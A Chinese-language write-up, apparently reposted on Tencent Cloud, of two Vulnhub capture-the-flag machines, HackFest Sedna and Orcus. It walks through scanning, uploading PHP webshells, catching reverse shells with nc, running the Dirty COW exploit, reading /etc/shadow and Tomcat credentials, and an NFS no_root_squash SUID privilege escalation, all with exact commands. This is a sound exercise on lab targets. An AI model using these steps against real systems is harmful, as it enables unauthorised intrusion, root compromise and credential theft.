自信的楼梯 · 预检 blob 请求 (REST API) ...· 6 天前 · |
茫然的显示器 · MsSQL2008R2安装基础流程笔记-腾讯 ...· 7 月前 · |
高大的猕猴桃 · java - tomcat8.0 jsp ...· 1 年前 · |
朝气蓬勃的包子 · 在 Power BI ...· 1 年前 · |
光明磊落的大象 · 关于java动态加载jar的问题?_百度知道· 1 年前 · |
HackFest :Sedna
目标:这台机器的目的是为那些在使用Vulnhub做机器方面有经验的人提供帮助
这台机器上有4个标志,一个用于shell,一个用于root访问,两个用于在Sedna上进行后期开发
flag1
使用nmap 扫描端口信息
nmap -v -T5 -A 192.168.31.72
看到部分详细信息,我们尝试打开80。查看一下源码,里面就一张图片,并没有什么线索。
图上还有部分端口信息没有显示出来,还开放有8080端口
是一个tomcat页面
使用dirsearch-master扫描目录
python3 dirsearch.py -u http://192.168.31.72 -e *
根据目录扫描的结果,我们查看一下robots.txt。
User-Agent: *
Disallow: Hackers
我们访问一下Hackers 发现目录被限制访问
查看license.txt ,发现一些信息,其中Copyright (c) 2012 - 2015 BuilderEngine / Radian Enterprise Systems。BuilderEngine/Radian企业系统,这是一条线索。
The MIT License (MIT)
Copyright (c) 2012 - 2015 BuilderEngine / Radian Enterprise Systems
Limited.
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.通过google搜索BuilderEngine exp ,在exploit-db找到漏洞利用的脚本
https://www.exploit-db.com/exploits/40390
下载好的exp,我们修改一下action地址为靶机地址192.168.31.72
upload.html
我们打开upload.html,上传一个php的shell
可以看到有个url: http://192.168.31.72/files/t.php 这个就是shell的路径了
使用菜刀连接shell,打开命令行,搜索一下flag.txt
find -name 'flag.txt'
./var/www/flag.txt
查看flag.txt
cat /var/www/flag.txt
bfbb7e6e6e88d9ae66848b9aeac6b289
flag2
尝试提权,拿到第二个flag
查看系统名、节点名称、操作系统的发行版号、操作系统版本、运行系统的机器 ID 号
uname -a
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC
2014 i686 i686 i686 GNU/Linux
查看系统安装时默认的发行版本信息
cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"
建议在提权之前做一次靶机的快照。
由于菜刀执行提权脚本时会阻塞,而且无法使用交互式的shell。这里我们切换成NC的shell
这里我们上传一个PHP脚本,并在kali用NC监听7777端口
我们访问http://192.168.219.139/files/testa.php kali接收到
了靶机传来的shell
输入Id,看到目前的权限还只是www-data
提权脚本https://www.exploit-db.com/exploits/40616
我们上传到files目录下,执行命令,可以看到最后执行提升到了root权限。
gcc cowroot.c -o cowroot -pthread
./cowroot
id
我们切换到root目录下, 查看一下flag
flag3
找到tomcat的账户密码
cat etc/tomcat7/tomcat-users.xml
flag4
找到需要解密的hash
cat /etc/shadow
HackFest :Orcus
目标:这台机器上有4个标志1.获得一个shell 2.获得root访问权限3.框上有一个帖子开发标志4.此框中有一些东西与此系列中的其他东西不同(Quaoar和Sedna)找到它的不同之处。
flag1
使用nmap扫描
nmap -v -T5 -A 192.168.31.119
使用dirsearch-master扫描目录
python3 dirsearch.py -u http://192.168.31.119 -e *
根据扫描到的结果,我们访问admin,打开后查看一下源码,发现一个hint
This is a backup taken from the backups/
源码里面,包含了数据库配置的文件。
db_conn.php
刚好有一个phpmyadmin,输入账号密码登陆。
构造写shell的sql语句
查看了一下资料secure-file-priv参数是用来限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()传到哪个指定目录的。
我们查看一下限制的目录
尝试通过修改mysql日志文件存储路径写shell,没有权限修改。
那只能换一个思路了。
一般数据库名,也是系统的名称。尝试访问一下。
http://192.168.31.119/zenphoto
发现一个未安装的CMS,谷歌了一下,发现这个CMS有些漏洞可以尝试。
填写数据库配置,设置后台用户名、密码
登陆上去看一下
在plugin下有个elFinder插件,开启以后,我们就可以任意上传文件了
我们把t1.php拖进去上传。
shell的路径:http://192.168.31.119/zenphoto/uploaded/t1.php
我们在kali监听4444端口
nc -lvp 4444
访问shell路径
使用python弹shell
python -c 'import pty; pty.spawn("/bin/bash")'
查询web目录下,有没有存在flag.txt
find /var/www/ -name 'flag.txt'
查看flag.txt文件
cat /var/www/flag.txt
flag2
尝试一下提权操作。
之前扫描到2049的端口(NFS),类似于文件服务器,这个如果存在配置不当,可以提升ROOT权限。
参考:https://bbs.pediy.com/thread-222518.htm
查看一下NFS的挂载点
showmount -e localhost
在kali下创建一个目录用于挂载NFS,然后挂载到本地
sudo mkdir /mnt/orcus
sudo mount -t nfs 192.168.0.110:/tmp /mnt/orcus
在靶机执行:
cp /bin/bash wroot
在kali上执行:
chown root:root 文件 wroot 的拥有者设为 root群体的使用者 root
chmod u+s文件执行时把进程的属主或组ID置为该文件的文件属主
sudo su
chown root:root wroot
chmod u+s wroot
最后在靶机执行:
./wroot -p
这里使用NFS提权。造成root提权的原因是 no_root_squash这个参数
no_root_squash:登入NFS主机,使用该共享目录时相当于该目录的拥有者,如果是root的话,那么对于这个共享的目录来说,他就具
有root的权限。
扫码关注腾讯云开发者
领取腾讯云代金券
Copyright © 2013 - 2023 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号: 粤B2-20090059 深公网安备号 44030502008569
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号 | 京公网安备号11010802020287
扫码关注腾讯云开发者
领取腾讯云代金券
光明磊落的大象 · 关于java动态加载jar的问题?_百度知道 1 年前 |